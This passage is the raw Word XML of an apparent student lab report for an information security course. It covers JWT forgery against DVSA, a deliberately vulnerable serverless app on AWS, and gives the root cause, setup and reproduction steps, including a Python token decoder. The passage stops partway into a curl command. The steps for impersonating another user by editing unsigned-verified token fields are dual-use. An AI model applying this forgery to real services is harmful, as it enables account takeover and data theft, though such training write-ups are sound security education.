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44459" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFA5ED1" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C80787" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67581ECC" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CEC829" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467776F4" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRPr="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730F3EA2" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E13FC43" w14:textId="73147667" w:rsidR="005C76E2" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>ICS-344</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D0CB2" w14:textId="2FEFD8D9" w:rsidR="00F24FB8" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AB9D0" w14:textId="7683A1C0" w:rsidR="00485BF3" w:rsidRDefault="00485BF3" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00207900">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>http://dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3BA613" w14:textId="37AEF1B0" w:rsidR="00CF3286" w:rsidRDefault="00C86308" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86308">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>us-east-1 (N. Virginia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1A2F6" w14:textId="1D497218" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>19 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A93E0F" w14:textId="77777777" w:rsidR="008A3F14" w:rsidRDefault="002E6C08" w:rsidP="002E6C08">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6C08">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Authentication </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507680AE" w14:textId="17F5256B" w:rsidR="00142AD2" w:rsidRDefault="002E6C08" w:rsidP="002E6C08">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6C08">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>(JWT Forgery / Identity Impersonation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758FF867" w14:textId="4FA3F729" w:rsidR="00AA14EA" w:rsidRDefault="00AA14EA" w:rsidP="002E6C08">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Lesson #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA9F9A" w14:textId="6E176124" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F68C1B" w14:textId="7ED3285E" w:rsidR="00F24FB8" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CD5CE" w14:textId="510145D2" w:rsidR="00BA72A1" w:rsidRDefault="00FB28D9" w:rsidP="00FB28D9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB28D9">
        <w:t>This lesson demonstrates a Broken Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB28D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB28D9">
        <w:t>vulnerability caused by improper handling of JSON Web Tokens (JWT). The system decodes the JWT payload without verifying its signature, allowing attackers to modify identity fields such as username and sub. This enables unauthorized access to other users’ data through token forgery</w:t>
      </w:r>
      <w:r w:rsidR="00FD2D58" w:rsidRPr="00FD2D58">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18516498" w14:textId="3122E45C" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Why This Works / Root Caus</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D2CC4" w14:textId="621FA2FF" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:r w:rsidRPr="00D40C4E">
        <w:t>The vulnerability exists because of the backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B43E1" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">Decodes the JWT payload without verifying the signature </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7DF10" w14:textId="1EE8440D" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">Trust’s identity fields such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF537DC" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">username </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CE4F8" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C989CBD" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:r w:rsidRPr="00D40C4E">
        <w:t>Since JWT payloads are only Base64 encoded (not encrypted), an attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1E3AA" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">Decode the token </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47D070" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">Modify identity fields </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014572A" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">Re-encode it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760D77A" w14:textId="77777777" w:rsidR="00D40C4E" w:rsidRPr="00D40C4E" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C4E">
        <w:t xml:space="preserve">Reuse the original signature </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582227" w14:textId="72BCEFB8" w:rsidR="00BA72A1" w:rsidRDefault="00D40C4E" w:rsidP="00D40C4E">
      <w:r w:rsidRPr="00D40C4E">
        <w:t>Because no signature verification is performed, the backend accepts the forged token as valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63819883" w14:textId="7E53F04B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Environment and Setu</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC2CCC" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DVSA deployed on AWS (us-east-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50C82D" w14:textId="347F707E" w:rsidR="00BA72A1" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>API Endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F17A71" w14:textId="04CB510B" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00207900">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://h3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50AB40FE" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tools used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E93820" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Browser (DevTools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121AF407" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F106033" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22474C16" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EAD61" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>AWS Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E1D5C" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0911F6" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lambda (DVSA-ORDER-MANAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081F497" w14:textId="4D02E568" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DynamoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC323B" w14:textId="39117F60" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:r w:rsidRPr="00E738FA">
        <w:lastRenderedPageBreak/>
        <w:t>Setup steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67379651" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Created two users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E871A" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User B (attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1DCF1" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User C (victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5E3FC" w14:textId="77777777" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Both users placed at least one order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E9125A" w14:textId="3D6843F7" w:rsidR="00E738FA" w:rsidRDefault="00E738FA" w:rsidP="00E738FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Captured JWT tokens using DevTools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730E1A1" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="51160CAF" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2C00F386" w14:textId="08D3D205" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC660C" w14:textId="77777777" w:rsidR="00BA687B" w:rsidRPr="00514B52" w:rsidRDefault="00BA687B" w:rsidP="00BA687B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00514B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Capture Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C739939" w14:textId="77777777" w:rsidR="00BA687B" w:rsidRDefault="00BA687B" w:rsidP="00BA687B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open DevTools → Network tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA08C1" w14:textId="77777777" w:rsidR="00BA687B" w:rsidRDefault="00BA687B" w:rsidP="00BA687B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capture Authorization headers for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BEC747" w14:textId="77777777" w:rsidR="00BA687B" w:rsidRDefault="00BA687B" w:rsidP="00BA687B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TOKEN_B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09E3F9" w14:textId="21357C2C" w:rsidR="00BA72A1" w:rsidRDefault="00BA687B" w:rsidP="00ED15C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TOKEN_C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161E648" w14:textId="2F9C2802" w:rsidR="008A71D9" w:rsidRPr="00514B52" w:rsidRDefault="008A71D9" w:rsidP="008A71D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00514B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Decode Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77EBAB" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>python3 - &lt;&lt;'PY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98B525" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>import os, json, base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196A24DC" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>def decode(token):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814CC4A" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    payload = token.split(".")[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EDE77B" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    payload += "=" * (-len(payload) % 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D64727" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return json.loads(base64.urlsafe_b64decode(payload.encode()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44748B8B" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461A2E62" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>for name in ["TOKEN_B","TOKEN_C"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75724C1A" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = decode(os.environ[name])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE6DDE" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("\n"+name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C29B132" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("username:", data.get("username"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F92F2" w14:textId="77777777" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("sub:", data.get("sub"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EFE185" w14:textId="07352835" w:rsidR="00863689" w:rsidRDefault="00863689" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E365F6" w14:textId="77777777" w:rsidR="00514B52" w:rsidRDefault="00514B52" w:rsidP="00863689">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63104DC6" w14:textId="77777777" w:rsidR="00514B52" w:rsidRDefault="00514B52" w:rsidP="00514B52">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00514B52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Confirm Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A98CE" w14:textId="77777777" w:rsidR="00576C3F" w:rsidRPr="00576C3F" w:rsidRDefault="00576C3F" w:rsidP="00576C3F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00576C3F">
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
